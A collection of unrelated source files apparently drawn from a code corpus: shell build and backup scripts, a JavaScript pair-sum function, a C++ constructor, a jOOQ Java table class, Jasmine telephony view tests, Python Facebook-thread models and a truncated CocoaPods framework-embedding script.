rm -rf "${DA_ROOT}/backup/log"
rsync -auq "${LOGDIRECTORY}/" "${DA_ROOT}/backup/log/"
fi
if [[ $CONTAINERROLE =~ .*:(all|cron):.* ]]; then
rm -f "${DA_ROOT}/backup/config.yml"
cp "${DA_CONFIG_FILE}" "${DA_ROOT}/backup/config.yml"
rm -rf "${DA_ROOT}/backup/files"
rsync -auq "${DA_ROOT}/files" "${DA_ROOT}/backup/"
fi
fi
echo "finished shutting down initialize" >&2
# Kill the background "sleep infinity" so the main script stops waiting.
kill %1
exit 0
}
# Run the deregister/backup handler when the container is asked to stop.
trap deregister SIGINT SIGTERM
echo "initialize finished" >&2
# Marker file that health checks use to detect a fully-initialized container.
touch "${DA_ROOT}/webapp/ready"
# Park the script: sleep forever in the background and wait on it, so the
# trap above can fire when a signal arrives.
sleep infinity &
wait %1
|
/**
 * Return every unordered pair of non-negative integers [i, j] with
 * i <= j and i + j === sum, in ascending order of i.
 *
 * Bug fix: the original bounded the inner loop's j by sum / 2, so any pair
 * whose larger member exceeds sum / 2 was never emitted — for odd sums the
 * result was always empty (e.g. findAllPairCombinations(3) returned []).
 * Since j is fully determined by i (j = sum - i), the inner loop is also
 * unnecessary; this runs in O(sum) instead of O(sum^2).
 *
 * @param {number} sum - non-negative integer target sum
 * @returns {number[][]} array of [i, sum - i] pairs with i <= sum - i
 */
function findAllPairCombinations(sum) {
  const result = [];
  // i ranges over the smaller member of each pair; i <= sum / 2
  // guarantees i <= sum - i, so each unordered pair appears exactly once.
  for (let i = 0; i <= sum / 2; i++) {
    result.push([i, sum - i]);
  }
  return result;
}
console.log(findAllPairCombinations(3)); |
#!/bin/bash
# Rebuild TeX Live system-wide state after package changes:
# regenerate all format files, then rebuild the font map files.
fmtutil-sys --all
#mtxrun --generate
updmap-sys
|
<reponame>BitPaw/BitFireEngine
#include "ServerListeningThreadInfo.h"
// Default-construct with no socket or server attached; both raw pointers
// start out null until a connection is bound.
BF::ServerListeningThreadInfo::ServerListeningThreadInfo() :
    ServerSocket(nullptr),
    ServerAdress(nullptr)
{
}
// Bind this listening-thread info to an existing socket and its server.
// Non-owning: the caller retains ownership of both pointers.
BF::ServerListeningThreadInfo::ServerListeningThreadInfo(IOSocket* serverSocket, Server* server) :
    ServerSocket(serverSocket),
    ServerAdress(server)
{
}
<reponame>vharsh/cattle2
/*
* This file is generated by jOOQ.
*/
package io.cattle.platform.core.model.tables;
import io.cattle.platform.core.model.CattleTable;
import io.cattle.platform.core.model.Keys;
import io.cattle.platform.core.model.tables.records.ServiceLogRecord;
import io.cattle.platform.db.jooq.converter.DataConverter;
import io.cattle.platform.db.jooq.converter.DateConverter;
import java.util.Arrays;
import java.util.Date;
import java.util.List;
import java.util.Map;
import javax.annotation.Generated;
import org.jooq.Field;
import org.jooq.ForeignKey;
import org.jooq.Identity;
import org.jooq.Schema;
import org.jooq.Table;
import org.jooq.TableField;
import org.jooq.UniqueKey;
import org.jooq.impl.TableImpl;
/**
* This class is generated by jOOQ.
*/
@Generated(
value = {
"http://www.jooq.org",
"jOOQ version:3.9.3"
},
comments = "This class is generated by jOOQ"
)
@SuppressWarnings({ "all", "unchecked", "rawtypes" })
// NOTE(review): generated by jOOQ 3.9.3 — do not hand-edit field definitions;
// regenerate from the database schema instead.
public class ServiceLogTable extends TableImpl<ServiceLogRecord> {
private static final long serialVersionUID = -710824202;
/**
* The reference instance of <code>cattle.service_log</code>
*/
public static final ServiceLogTable SERVICE_LOG = new ServiceLogTable();
/**
* The class holding records for this type
*/
@Override
public Class<ServiceLogRecord> getRecordType() {
return ServiceLogRecord.class;
}
/**
* The column <code>cattle.service_log.id</code>.
*/
public final TableField<ServiceLogRecord, Long> ID = createField("id", org.jooq.impl.SQLDataType.BIGINT.nullable(false), this, "");
/**
* The column <code>cattle.service_log.account_id</code>.
*/
public final TableField<ServiceLogRecord, Long> ACCOUNT_ID = createField("account_id", org.jooq.impl.SQLDataType.BIGINT, this, "");
/**
* The column <code>cattle.service_log.kind</code>.
*/
public final TableField<ServiceLogRecord, String> KIND = createField("kind", org.jooq.impl.SQLDataType.VARCHAR.length(255).nullable(false), this, "");
/**
* The column <code>cattle.service_log.description</code>.
*/
public final TableField<ServiceLogRecord, String> DESCRIPTION = createField("description", org.jooq.impl.SQLDataType.VARCHAR.length(1024), this, "");
/**
* The column <code>cattle.service_log.created</code>.
*/
// DateConverter maps the SQL TIMESTAMP to java.util.Date.
public final TableField<ServiceLogRecord, Date> CREATED = createField("created", org.jooq.impl.SQLDataType.TIMESTAMP, this, "", new DateConverter());
/**
* The column <code>cattle.service_log.data</code>.
*/
// DataConverter maps the CLOB column to a Map<String, Object>.
public final TableField<ServiceLogRecord, Map<String,Object>> DATA = createField("data", org.jooq.impl.SQLDataType.CLOB, this, "", new DataConverter());
/**
* The column <code>cattle.service_log.end_time</code>.
*/
public final TableField<ServiceLogRecord, Date> END_TIME = createField("end_time", org.jooq.impl.SQLDataType.TIMESTAMP, this, "", new DateConverter());
/**
* The column <code>cattle.service_log.event_type</code>.
*/
public final TableField<ServiceLogRecord, String> EVENT_TYPE = createField("event_type", org.jooq.impl.SQLDataType.VARCHAR.length(255), this, "");
/**
* The column <code>cattle.service_log.service_id</code>.
*/
public final TableField<ServiceLogRecord, Long> SERVICE_ID = createField("service_id", org.jooq.impl.SQLDataType.BIGINT, this, "");
/**
* The column <code>cattle.service_log.instance_id</code>.
*/
public final TableField<ServiceLogRecord, Long> INSTANCE_ID = createField("instance_id", org.jooq.impl.SQLDataType.BIGINT, this, "");
/**
* The column <code>cattle.service_log.transaction_id</code>.
*/
public final TableField<ServiceLogRecord, String> TRANSACTION_ID = createField("transaction_id", org.jooq.impl.SQLDataType.VARCHAR.length(255), this, "");
/**
* The column <code>cattle.service_log.sub_log</code>.
*/
// BIT NOT NULL with a database-side default of b'0' (false).
public final TableField<ServiceLogRecord, Boolean> SUB_LOG = createField("sub_log", org.jooq.impl.SQLDataType.BIT.nullable(false).defaultValue(org.jooq.impl.DSL.inline("b'0'", org.jooq.impl.SQLDataType.BIT)), this, "");
/**
* The column <code>cattle.service_log.level</code>.
*/
public final TableField<ServiceLogRecord, String> LEVEL = createField("level", org.jooq.impl.SQLDataType.VARCHAR.length(255), this, "");
/**
* The column <code>cattle.service_log.deployment_unit_id</code>.
*/
public final TableField<ServiceLogRecord, Long> DEPLOYMENT_UNIT_ID = createField("deployment_unit_id", org.jooq.impl.SQLDataType.BIGINT, this, "");
/**
* Create a <code>cattle.service_log</code> table reference
*/
public ServiceLogTable() {
this("service_log", null);
}
/**
* Create an aliased <code>cattle.service_log</code> table reference
*/
public ServiceLogTable(String alias) {
this(alias, SERVICE_LOG);
}
// Private aliasing constructors used by as()/rename() below.
private ServiceLogTable(String alias, Table<ServiceLogRecord> aliased) {
this(alias, aliased, null);
}
private ServiceLogTable(String alias, Table<ServiceLogRecord> aliased, Field<?>[] parameters) {
super(alias, null, aliased, parameters, "");
}
/**
* {@inheritDoc}
*/
@Override
public Schema getSchema() {
return CattleTable.CATTLE;
}
/**
* {@inheritDoc}
*/
@Override
public Identity<ServiceLogRecord, Long> getIdentity() {
return Keys.IDENTITY_SERVICE_LOG;
}
/**
* {@inheritDoc}
*/
@Override
public UniqueKey<ServiceLogRecord> getPrimaryKey() {
return Keys.KEY_SERVICE_LOG_PRIMARY;
}
/**
* {@inheritDoc}
*/
@Override
public List<UniqueKey<ServiceLogRecord>> getKeys() {
return Arrays.<UniqueKey<ServiceLogRecord>>asList(Keys.KEY_SERVICE_LOG_PRIMARY);
}
/**
* {@inheritDoc}
*/
@Override
public List<ForeignKey<ServiceLogRecord, ?>> getReferences() {
return Arrays.<ForeignKey<ServiceLogRecord, ?>>asList(Keys.FK_SERVICE_LOG__ACCOUNT_ID, Keys.FK_SERVICE_LOG__SERVICE_ID, Keys.FK_SERVICE_LOG__INSTANCE_ID, Keys.FK_SERVICE_LOG__DEPLOYMENT_UNIT_ID);
}
/**
* {@inheritDoc}
*/
@Override
public ServiceLogTable as(String alias) {
return new ServiceLogTable(alias, this);
}
/**
* Rename this table
*/
@Override
public ServiceLogTable rename(String name) {
return new ServiceLogTable(name, null);
}
}
|
<filename>spec/javascripts/telephony/views/conversation_view_spec.js
describe("Zest.Telephony.Views.ConversationView", function() {
describe("#render", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
});
it("displays conversation controls", function() {
expect(view.el).toContain("input[name=number]");
expect(view.el).toContain("button.initiate-conversation");
});
it("does not display a conversation message", function() {
expect(view.$('.friendly-message')).toHaveText("");
});
});
describe('event handling', function() {
describe("receiving an outbound telephony:Connect event", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
view.conversation.set({state: 'connecting'});
var data = {
conversation_id: 10,
conversation_state: "connecting",
call_id: 20,
number: "1111111111"
};
$(document).trigger('telephony:Connect', data);
});
it("displays a ringing message", function() {
expect(view.el).toHaveText(/Ringing/);
});
it("displays the phone number", function() {
expect(view.$("[name='number']")).toHaveValue("1111111111");
});
});
describe("receiving a telephony:InitializeWidget event", function () {
var view;
beforeEach(function () {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
view.friendlyMessage = "Call Ended";
$(document).trigger('telephony:InitializeWidget');
});
it("clears the friendly message", function () {
expect(view.$(".friendly-message")).toHaveText("");
});
});
describe("receiving an inbound telephony:Connect event", function () {
var view;
beforeEach(function () {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
var data = {
conversation_id: 10,
conversation_state: "connecting",
number: "1111111111",
call_id: 20
};
$(document).trigger('telephony:Connect', data);
});
it("displays the inbound number", function () {
expect(view.$("[name='number']")).toHaveValue("1111111111");
});
});
describe("receiving a telephony:Start event", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
var data = {
conversation_id: 10,
conversation_state: "connecting",
call_id: 20,
number: "1111111111"
};
$(document).trigger('telephony:Start', data);
});
it("displays a connected message", function() {
expect(view.el).toHaveText(/Connected/);
});
it("displays the phone number", function() {
expect(view.$("[name='number']")).toHaveValue("1111111111");
});
});
describe("receiving a telephony:Terminate event", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.conversation.set({ state: 'on_a_call',
isCancelable: true });
view.render();
var data = {
conversation_id: 10
};
runs(function() {
view.friendlyMessageFadeOutTime = 100;
$(document).trigger('telephony:Terminate', data);
});
waitsFor(function() {
return view.$('.friendly-message').css('opacity') < 1;
}, "didn't fade out the call ended message");
});
it("fades outs a call ended message", function() {
runs(function() {
expect(view.el).toHaveText(/Call Ended/);
});
});
it('re-displays the call button', function() {
runs(function() {
expect(view.$('.initiate-conversation')).not.toHaveClass('hidden');
});
});
it("does not display the phone number", function() {
runs(function() {
expect(view.$("[name='number']")).toHaveValue("");
});
});
it("does not display the cancel transfer button", function() {
runs(function() {
expect(view.$('.cancel-transfer')).toHaveClass('hidden');
});
});
});
describe("receiving a telephony:InitiateOneStepTransfer event", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
});
describe("for agent 1", function() {
beforeEach(function() {
var data = {
transferrer: true,
agent_name: "<NAME>",
agent_ext: 10,
agent_type: 'A',
number: "1111111111"
};
$(view.el).text('Connected');
$(document).trigger('telephony:InitiateOneStepTransfer', data);
});
it("does not display a one step transfer initiated message", function() {
expect(view.el).toHaveText(/Connected/);
});
});
describe("for agent 2", function() {
beforeEach(function() {
var data = {
transferrer: false,
agent_name: "<NAME>",
agent_ext: 11,
agent_type: 'A',
number: "1111111112"
};
$(document).trigger('telephony:InitiateOneStepTransfer', data);
});
it("displays a one step transfer initiated message", function() {
expect(view.el).toHaveText(/1-step transfer from A - Another Name x11/);
});
it("displays the phone number", function() {
expect(view.$("[name='number']")).toHaveValue("1111111112");
});
});
});
describe("receiving a telephony:CompleteOneStepTransfer event", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
var data = {
agent_name: "<NAME>",
agent_ext: 10,
agent_type: 'A',
number: "1111111111"
};
$(document).trigger('telephony:CompleteOneStepTransfer', data);
});
it("displays a one step transfer completed message", function() {
expect(view.el).toHaveText(/Connected/);
});
it("displays the phone number", function() {
expect(view.$("[name='number']")).toHaveValue("1111111111");
});
});
describe("receiving a telephony:FailOneStepTransfer event", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
});
describe('for agent1', function() {
beforeEach(function() {
var data = {
transferrer: true,
agent_name: "<NAME>",
agent_ext: 10,
agent_type: 'A',
number: "1111111111"
};
$(document).trigger('telephony:FailOneStepTransfer', data);
});
it("does not display a one step transfer failed message", function() {
expect(view.el).not.toHaveText(/Missed 1-step transfer/);
});
it('terminates its conversation', function() {
expect(view.conversation.get('state')).toEqual('terminated');
});
});
describe('for agent2', function() {
beforeEach(function() {
var data = {
transferrer: false,
agent_name: "<NAME>",
agent_ext: 10,
agent_type: 'A',
number: "1111111111"
};
$(document).trigger('telephony:FailOneStepTransfer', data);
});
it("displays a one step transfer failed message", function() {
expect(view.el).toHaveText(/Missed 1-step transfer from A - Some Name x10/);
});
it('terminates its conversation', function() {
expect(view.conversation.get('state')).toEqual('terminated');
});
});
});
describe("receiving a telephony:InitiateTwoStepTransfer event", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
});
describe("for the initiator of the transfer", function() {
beforeEach(function() {
var data = {
transferrer: true,
agent_name: "<NAME>",
agent_ext: 10,
agent_type: 'A',
number: "1111111111"
};
$(document).trigger('telephony:InitiateTwoStepTransfer', data);
});
it("displays a two step transfer initiated message", function() {
expect(view.el).toHaveText(/Ringing A - Some Name x10/);
});
it("displays the phone number", function() {
expect(view.$("[name='number']")).toHaveValue("1111111111");
});
});
describe("for the recipient of the transfer", function() {
beforeEach(function() {
var data = {
transferrer: false,
agent_name: "<NAME>",
agent_ext: 10,
agent_type: 'A',
number: "1111111111"
};
$(document).trigger('telephony:InitiateTwoStepTransfer', data);
});
it("displays a two step transfer initiated message", function() {
expect(view.el).toHaveText(/2-step transfer from A - Some Name x10/);
});
it("displays the phone number", function() {
expect(view.$("[name='number']")).toHaveValue("1111111111");
});
});
});
describe("receiving a telephony:FailTwoStepTransfer event", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
});
describe('for agent1', function() {
beforeEach(function() {
var data = {
transferrer: true,
agent_name: "Agent 2",
agent_ext: 10,
number: "1111111111"
};
runs(function() {
view.friendlyMessageFadeOutTime = 100;
$(document).trigger('telephony:FailTwoStepTransfer', data);
});
waitsFor(function() {
return view.$('.friendly-message').css('opacity') < 1;
}, "didn't fade out the two step transfer failed message", 1000);
});
it("displays a two step transfer failed message", function() {
expect(view.$('.friendly-message')).toHaveText("No Answer - Agent 2 x10");
});
it("displays agent2's phone number", function() {
runs(function() {
expect(view.$("[name='number']")).toHaveValue("1111111111");
});
});
});
describe('for agent2', function() {
beforeEach(function() {
var data = {
transferrer: false,
agent_name: "<NAME>",
agent_ext: 11,
agent_type: 'B',
number: "1111111111"
};
$(document).trigger('telephony:FailTwoStepTransfer', data);
});
it("displays a two step transfer failed message", function() {
expect(view.el).toHaveText(/Missed 2-step transfer from B - Other Name x11/);
});
});
});
describe("receiving a telephony:CompleteTwoStepTransfer event", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
var data = {
agent_name: "<NAME>",
agent_ext: 10,
agent_type: 'A',
number: "1111111111"
};
$(document).trigger('telephony:CompleteTwoStepTransfer', data);
});
it("displays a two step transfer completed message", function() {
expect(view.el).toHaveText(/Connected to A - Some Name x10/);
});
it("displays the phone number", function() {
expect(view.$("[name='number']")).toHaveValue("1111111111");
});
});
describe("receiving a telephony:LeaveTwoStepTransfer event", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
var data = {
number: "1111111111"
};
$(document).trigger('telephony:LeaveTwoStepTransfer', data);
});
it("displays a leave two step transfer message", function() {
expect(view.el).toHaveText(/Connected/);
});
it("displays the phone number", function() {
expect(view.$("[name='number']")).toHaveValue("1111111111");
});
});
describe("receiving a telephony:CustomerLeftTwoStepTransfer event", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
var data = {
agent_name: "<NAME>",
agent_ext: 10,
agent_type: 'A',
number: "1111111111"
};
$(document).trigger('telephony:CustomerLeftTwoStepTransfer', data);
});
it("displays a customer left two step transfer message", function() {
expect(view.el).toHaveText(/Connected to A - Some Name x10/);
});
it("displays the phone number", function() {
expect(view.$("[name='number']")).toHaveValue("1111111111");
});
});
describe("receiving a telephony:ClickToCall event", function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView({el: $("#conversation-wrapper")});
view.render();
var data = {
loan_id: '1',
to: '3003004002',
to_id: '9',
to_type: 'borrower',
callee_name: '<NAME>'
};
$(document).trigger('telephony:ClickToCall', data);
});
it("displays the callee name", function() {
expect(view.el).toHaveText(/Some Name/);
});
it("updates the conversation", function() {
var convo = view.conversation;
expect(convo.get('to')).toBe('3003004002');
expect(convo.get('toId')).toBe('9');
expect(convo.get('toType')).toBe('borrower');
});
it("displays the phone number", function() {
expect(view.$("[name='number']")).toHaveValue("3003004002");
});
});
describe('receiving a transferFailed event from its TransferView subview', function() {
var view;
beforeEach(function() {
setFixtures('<div id="conversation-wrapper"></div>');
view = new Zest.Telephony.Views.ConversationView();
view.render();
$(document).trigger('transferFailed', 'Agent is unavailable');
});
it('displays a transfer failed message', function() {
expect(view.$('.friendly-message')).toHaveText('Agent is unavailable');
});
});
});
// Spec: submitting the form POSTs a new conversation for valid numbers and
// shows a validation message otherwise.
describe("submitting a conversation", function() {
  var view;

  beforeEach(function() {
    setFixtures('<div id="conversation-wrapper" />');
    view = new Zest.Telephony.Views.ConversationView({loanId: 123});
    view.conversation.set({ state: 'not_initiated' });
    view.render();
    jasmine.Ajax.useMock();
  });

  describe('with a valid phone number', function() {
    // Small helper so each example reads as "submit, then assert".
    var submit = function() {
      view.$('button.initiate-conversation').click();
    };

    beforeEach(function() {
      view.$('input[name=number]').val("300-300-4000");
    });

    it("creates a new conversation", function() {
      submit();
      var request = mostRecentAjaxRequest();
      expect(request.url).toBe('/zestphone/conversations');
      expect(request.method).toBe('POST');
      expect(request.params).toMatch('loan_id=123');
    });

    it("disables the phone number input", function() {
      submit();
      expect(view.$('input[name=number]')).toBeDisabled();
      expect(view.$('input[name=number]')).toHaveValue('300-300-4000');
    });

    it("disables the call button", function() {
      submit();
      expect(view.$('button.initiate-conversation')).toBeDisabled();
    });
  });

  describe('with an invalid phone number', function() {
    beforeEach(function() {
      view.conversation.set({state: "not_initiated"});
      view.$('input[name=number]').val('');
      view.$('button.initiate-conversation').click();
    });

    it('displays an error message', function() {
      expect(view.$('.friendly-message')).toHaveText(/Please enter a 10-digit phone number/);
    });
  });
});
// Spec: after a completed call the view can POST a second conversation
// without reloading the page.
describe("submitting a conversation without a page reload", function() {
  var view;

  beforeEach(function() {
    setFixtures('<div class="conversation-wrapper" />');
    view = new Zest.Telephony.Views.ConversationView();
    view.render();
    view.$('input[name=number]').val("3003004000");
    jasmine.Ajax.useMock();
  });

  it("creates a new conversation every time", function() {
    var data = '{"id":110,"caller_call_id":238,"callee_call_id":239}';
    // First call
    view.$('button.initiate-conversation').click();
    // FIX: these two were assigned without `var`, leaking implicit globals
    // across specs (and throwing a ReferenceError under strict mode).
    var firstCallRequest = mostRecentAjaxRequest();
    firstCallRequest.response({ status:200, responseText:data });
    expect(firstCallRequest.url).toBe('/zestphone/conversations');
    // Enable calling
    view.conversation.set({state: 'terminated'});
    // Second call
    view.$('button.initiate-conversation').click();
    var secondCallRequest = mostRecentAjaxRequest();
    expect(secondCallRequest.url).toBe('/zestphone/conversations');
  });
});
// Spec: disableCallControl with callingDisabled set greys out the call button.
describe("#disableCallControl", function() {
  var controlView;

  beforeEach(function() {
    setFixtures('<div id="conversation-wrapper" />');
    controlView = new Zest.Telephony.Views.ConversationView();
    controlView.render();
    controlView.disableCallControl({ callingDisabled: true });
  });

  it("disables the initiate conversation button", function() {
    expect(controlView.$('button.initiate-conversation')).toBeDisabled();
  });
});
});
|
import attr
from ._core import Enum
class ThreadType(Enum):
    """Used to specify what type of Facebook thread is being used.

    See :ref:`intro_threads` for more info.
    """

    USER = 1
    GROUP = 2
    # ROOM shares GROUP's value; under standard ``Enum`` semantics that makes
    # it an alias of GROUP, in which case the dict in ``_to_class`` below maps
    # GROUP to ``_group.Room`` (last key wins). NOTE(review): confirm the
    # custom ``Enum`` base in ``._core`` and whether this aliasing is intended.
    ROOM = 2
    PAGE = 3

    def _to_class(self):
        """Convert this enum value to the corresponding class."""
        # Imported lazily to avoid a circular import with the model modules.
        from . import _user, _group, _page

        return {
            ThreadType.USER: _user.User,
            ThreadType.GROUP: _group.Group,
            ThreadType.ROOM: _group.Room,
            ThreadType.PAGE: _page.Page,
        }[self]
class ThreadLocation(Enum):
    """Used to specify where a thread is located (inbox, pending, archived, other)."""

    # Values are the raw folder identifiers used by the API payloads.
    INBOX = "INBOX"
    PENDING = "PENDING"
    ARCHIVED = "ARCHIVED"
    OTHER = "OTHER"
class ThreadColor(Enum):
    """Used to specify a thread color (lower-case ``#rrggbb`` hex strings)."""

    MESSENGER_BLUE = "#0084ff"
    VIKING = "#44bec7"
    GOLDEN_POPPY = "#ffc300"
    RADICAL_RED = "#fa3c4c"
    SHOCKING = "#d696bb"
    PICTON_BLUE = "#6699cc"
    FREE_SPEECH_GREEN = "#13cf13"
    PUMPKIN = "#ff7e29"
    LIGHT_CORAL = "#e68585"
    MEDIUM_SLATE_BLUE = "#7646ff"
    DEEP_SKY_BLUE = "#20cef5"
    FERN = "#67b868"
    CAMEO = "#d4a88c"
    BRILLIANT_ROSE = "#ff5ca1"
    BILOBA_FLOWER = "#a695c7"
    TICKLE_ME_PINK = "#ff7ca8"
    MALACHITE = "#1adb5b"
    RUBY = "#f01d6a"
    DARK_TANGERINE = "#ff9c19"
    BRIGHT_TURQUOISE = "#0edcde"

    @classmethod
    def _from_graphql(cls, color):
        """Convert a GraphQL color string into a :class:`ThreadColor`.

        Returns ``None`` for ``None`` input and the default MESSENGER_BLUE
        for a falsy (e.g. empty-string) value. Unknown colors are delegated
        to ``_extend_if_invalid`` provided by the ``Enum`` base in ``._core``
        — presumably it registers the unknown value; confirm there.
        """
        if color is None:
            return None
        if not color:
            return cls.MESSENGER_BLUE
        # assumes an 8-digit ARGB string such as "FF0084FF" where the first
        # two characters are the alpha channel — TODO confirm the API always
        # includes the alpha prefix
        color = color[2:]  # Strip the alpha value
        value = "#{}".format(color.lower())
        return cls._extend_if_invalid(value)
# NOTE(review): ``cmp=False`` is deprecated in newer ``attrs`` releases in
# favor of ``eq``/``order`` — confirm the pinned attrs version before changing.
@attr.s(cmp=False, init=False)
class Thread:
    """Represents a Facebook thread."""

    #: The unique identifier of the thread. Can be used a ``thread_id``. See :ref:`intro_threads` for more info
    uid = attr.ib(converter=str)
    #: Specifies the type of thread. Can be used a ``thread_type``. See :ref:`intro_threads` for more info
    type = attr.ib()
    #: A URL to the thread's picture
    photo = attr.ib(None)
    #: The name of the thread
    name = attr.ib(None)
    #: Timestamp of last message
    last_message_timestamp = attr.ib(None)
    #: Number of messages in the thread
    message_count = attr.ib(None)
    #: Set :class:`Plan`
    plan = attr.ib(None)

    def __init__(
        self,
        _type,
        uid,
        photo=None,
        name=None,
        last_message_timestamp=None,
        message_count=None,
        plan=None,
    ):
        # Hand-written __init__ (attrs ``init=False``) so that ``uid`` is
        # coerced to ``str`` and the thread type is taken positionally first.
        self.uid = str(uid)
        self.type = _type
        self.photo = photo
        self.name = name
        self.last_message_timestamp = last_message_timestamp
        self.message_count = message_count
        self.plan = plan

    @staticmethod
    def _parse_customization_info(data):
        """Extract emoji/color/nickname customizations from a thread payload.

        Returns an empty dict when no ``customization_info`` is present.
        For group threads the result carries a ``nicknames`` dict keyed by
        participant id; for one-to-one threads it carries ``nickname`` (the
        other user's) and/or ``own_nickname``.
        """
        if data is None or data.get("customization_info") is None:
            return {}
        info = data["customization_info"]
        rtn = {
            "emoji": info.get("emoji"),
            "color": ThreadColor._from_graphql(info.get("outgoing_bubble_color")),
        }
        # Any of these markers identifies a group thread — presumably which
        # marker is present depends on the endpoint; TODO confirm.
        if (
            data.get("thread_type") == "GROUP"
            or data.get("is_group_thread")
            or data.get("thread_key", {}).get("thread_fbid")
        ):
            rtn["nicknames"] = {}
            for k in info.get("participant_customizations", []):
                rtn["nicknames"][k["participant_id"]] = k.get("nickname")
        elif info.get("participant_customizations"):
            # One-to-one thread: at most the first two entries are examined,
            # one per participant. The entry whose id matches the other user
            # becomes "nickname"; the other becomes "own_nickname".
            uid = data.get("thread_key", {}).get("other_user_id") or data.get("id")
            pc = info["participant_customizations"]
            if len(pc) > 0:
                if pc[0].get("participant_id") == uid:
                    rtn["nickname"] = pc[0].get("nickname")
                else:
                    rtn["own_nickname"] = pc[0].get("nickname")
            if len(pc) > 1:
                if pc[1].get("participant_id") == uid:
                    rtn["nickname"] = pc[1].get("nickname")
                else:
                    rtn["own_nickname"] = pc[1].get("nickname")
        return rtn

    def _to_send_data(self):
        # TODO: Only implement this in subclasses
        return {"other_user_fbid": self.uid}
|
#!/bin/bash
# CocoaPods "Embed Frameworks" build-phase script.
#
# FIX: shebang changed from /bin/sh to /bin/bash — this script relies on
# bash-only features (the RSYNC_PROTECT_TMP_FILES array, [[ ]] tests and
# ${PIPESTATUS[0]}), so it must not run under a strictly POSIX sh.
set -e
set -u
set -o pipefail

# FIX: quote the expansion so the test is well-formed even when the variable
# is unset ( ${VAR+x} expands to "x" when set, empty otherwise ).
if [ -z "${FRAMEWORKS_FOLDER_PATH+x}" ]; then
  # If FRAMEWORKS_FOLDER_PATH is not set, then there's nowhere for us to copy
  # frameworks to, so exit 0 (signalling the script phase was successful).
  exit 0
fi

echo "mkdir -p ${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
mkdir -p "${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"

# Default to sequential signing unless Xcode exported the parallel flag.
COCOAPODS_PARALLEL_CODE_SIGN="${COCOAPODS_PARALLEL_CODE_SIGN:-false}"
SWIFT_STDLIB_PATH="${DT_TOOLCHAIN_DIR}/usr/lib/swift/${PLATFORM_NAME}"

# Used as a return value for each invocation of `strip_invalid_archs` function.
STRIP_BINARY_RETVAL=0

# This protects against multiple targets copying the same framework dependency at the same time. The solution
# was originally proposed here: https://lists.samba.org/archive/rsync/2008-February/020158.html
RSYNC_PROTECT_TMP_FILES=(--filter "P .*.??????")
# Copies and strips a vendored framework
install_framework()
{
if [ -r "${BUILT_PRODUCTS_DIR}/$1" ]; then
local source="${BUILT_PRODUCTS_DIR}/$1"
elif [ -r "${BUILT_PRODUCTS_DIR}/$(basename "$1")" ]; then
local source="${BUILT_PRODUCTS_DIR}/$(basename "$1")"
elif [ -r "$1" ]; then
local source="$1"
fi
local destination="${TARGET_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
if [ -L "${source}" ]; then
echo "Symlinked..."
source="$(readlink "${source}")"
fi
# Use filter instead of exclude so missing patterns don't throw errors.
echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${destination}\""
rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${destination}"
local basename
basename="$(basename -s .framework "$1")"
binary="${destination}/${basename}.framework/${basename}"
if ! [ -r "$binary" ]; then
binary="${destination}/${basename}"
fi
# Strip invalid architectures so "fat" simulator / device frameworks work on device
if [[ "$(file "$binary")" == *"dynamically linked shared library"* ]]; then
strip_invalid_archs "$binary"
fi
# Resign the code if required by the build settings to avoid unstable apps
code_sign_if_enabled "${destination}/$(basename "$1")"
# Embed linked Swift runtime libraries. No longer necessary as of Xcode 7.
if [ "${XCODE_VERSION_MAJOR}" -lt 7 ]; then
local swift_runtime_libs
swift_runtime_libs=$(xcrun otool -LX "$binary" | grep --color=never @rpath/libswift | sed -E s/@rpath\\/\(.+dylib\).*/\\1/g | uniq -u && exit ${PIPESTATUS[0]})
